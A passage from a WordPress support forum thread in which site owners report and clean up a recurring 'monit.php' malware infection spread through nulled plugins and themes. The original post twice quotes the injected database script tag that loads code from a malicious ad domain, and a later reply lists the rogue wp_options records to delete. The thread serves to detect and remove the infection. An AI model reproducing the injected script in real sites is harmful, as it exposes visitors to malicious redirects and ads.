Support » Plugin: Anti-Malware Security and Brute-Force Firewall » DB Injection appears again and again…

  • Resolved theone211

    (@theone211)


    Hello,
    First, thanks for this perfect plugin, it helped me a lot and solved many problems with Malware and DB injections.

    My troubles began like this: Redirecting from my site when someone click on picture, menu or anywhere. When I’m logged in as an admin, it doesn’t redirect. That’s why I didn’t notice the problem.
    2 days ago
    – Adwords disabled all ads (Malware detected)
    – Sucuri scaning critical warning “?Rogueads – Malware”, infected file I think was „404javascript file“, I dont remember exact name. I could not found it anywhere on server to delete it.

    Cleaning:
    PHASE 1. Wordfence – Found “Rogueads – Malware issue” – DELETED – After cleaning Sucuri Rogueads Malware appeared again.
    PHASE 2. after that I checked with your plugin and found this:
    cache/…/3rd-party dir found „pushsar.com-pfe-current-tag.min“ – deleted
    plugins/root dir found „monit.php“ (Monitization plugin) – deleted
    „admin_ips.txt“ write all my admin ip addresses – deleted
    DB Injections: NtBiZLQDoptions:361339:”ad_code” <script type=”text/javascript” src=”//ofgogoatan.com/apu.php?zoneid=3260072″ async data-cfasync=”false”></script> – DELETED
    after all this NO Warning Sucuri 🙂

    BUT on new scan:
    PHASE 1. Wordfance does not detect anything.
    PHASE 2. with your plugin AGAIN detect ONLY DB Injections: NtBiZLQDoptions:361339:”ad_code” <script type=”text/javascript” src=”//ofgogoatan.com/apu.php?zoneid=3260072″ async data-cfasync=”false”></script> – DELETED
    „admin_ips.txt“ file is also created AGAIN – I don’t know if it’s normal for this file to be created at all.

    I’m losing my nerve with this malware.

    Thank you in advance 🙂

    • This topic was modified 11 months, 1 week ago by theone211.
    • This topic was modified 11 months, 1 week ago by theone211.
Viewing 11 replies - 31 through 41 (of 41 total)
  • @sahilkumargaba

    If you are offering to remove monit.php you should make it clear that you are charging a fee.

    Plugin Author Eli

    (@scheeeli)

    @sahilkumargaba,
    If you are charging a fee and are unwilling to admit that on this forum then you already know that this is not the place for your post. If you have a solution that you would like to share with other here then please post the full details of your solution here.

    Also, please note that my plugin can also automatically fix this threat and completely remove the malware from your site if you have the latest definition updates, so what are you offering that they cannot already get for free from my plugin.

    Hello dev. @scheeeli
    Many thanks for your plugin. You safe my website.
    Fixed. clean all: monit.php and sql injection!
    I recommend this plugin to everyone!

    edit: However, I would like to know how this malware got on our sites! if anyone can clarify

    • This reply was modified 10 months, 1 week ago by Pablito.
    • This reply was modified 10 months, 1 week ago by Pablito.

    @josecarlostf Hi, can you please help me with “after running scan, the URL is still injected in DB, usually can be found in information_schema process table. No harm is being done at this point but Google will still read the malicious URL.” I managed to clean the page and db, only instance left is this one in Information_Schema -> Processlist. I need to reenablke my Google Ads ASAP. Thank you so much!

    @yovosi if the information remains within the schema process list it shouldnt do any harm. What you need to do is identify the URL where Google picks up the malicious URL. There is a chance that the URL doesnt exist so you might need to load an empty HTML page (without code) so that when Google picks up the site again it will be able to verify that its clean.

    Just insist with Google support to provide the URL.

    Some additional advice:
    Update WordPress
    Make sure all plugins are from verified sources (uninstall if you have any suspicious plugins).

    @kogluxury it usually originates from cracked plugins or themes, just make sure your site uses original files downloaded from the author site.

    @josecarlostf Excellent, thank you. That’s good news as I was looking for ways to remove it from information schema, but probably it can’t be done.

    @kogluxury Yes, what @josecarlostf said. I made a mistake of installing nnulled plugin and there was some malicious addition in it, which I probably wouldn’t even detect, if it weren’t for Google Ads rejection. I did however learnt a loooot (and slept not so much :D) in the process regarding webpage management, WP structure, php, mySQL,… 🙂

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Forum Moderator & Support Team Volunteer

    @sahilkumargaba

    Please do not ask for off forum contact.

    Forum Guidelines

    You’ve been placed on “modwatch” until we’re convinced such postings have stopped. Your account has *not* been banned, we just want to check things for a while before they’re public. If you wish to take issue with this, contact moderators via the #forums channel on slack (https://make.wordpress.org/slack).

    Plugin Author Eli

    (@scheeeli)

    @josecarlostf,
    Just wanted to say thanks for your contribution here. You advice is spot-on and I want to agree with you on all points.

    I especially want to reinforce that downloading plugins from an unofficial source is the easiest way to get your site hacked 😉

    Hey,
    happy to find this post !

    So I’m having this virus too. I know how it appeared. I downloaded Nulled themes from free websites (I wanted to test out a few themes before making a purchase decision on envato ! Bas decision !)

    How I found it? I was navigating my website and I saw popup appearing on the top right corner.

    I resetted my WP install using WP Reset plugin, but not sure it’s enough, even with a database cleanup plugin.
    To be on the safe side I just deleted my server instance and create a new one with a fresh install.

    I will not download anything WordPress related from unofficial source !

    There seems to be a solution here:
    https://bitofwp.com/security/how-to-trace-and-clean-the-monit-php-hack/

    Apart from cleaning all of your WordPress site files from the malware redirect hack and deleting the monit.php file under the plugins directory, you will also need to access your database using phpMyAdmin, then browse to your wp_options database table and search for the following option_name records:

    default_mont_options
    ad_code
    hide_admin
    hide_logged_in
    display_ad
    search_engines
    auto_update
    ip_admin
    cookies_admin
    logged_admin
    log_install
    Finally, if you find any of those records present delete them but first make sure you have created a backup for your WordPress site first(both the site files and its MySQL Database).

    The last step is to remove the admins_ip.txt file found in the plugins directory as well.

Viewing 11 replies - 31 through 41 (of 41 total)
  • The topic ‘DB Injection appears again and again…’ is closed to new replies.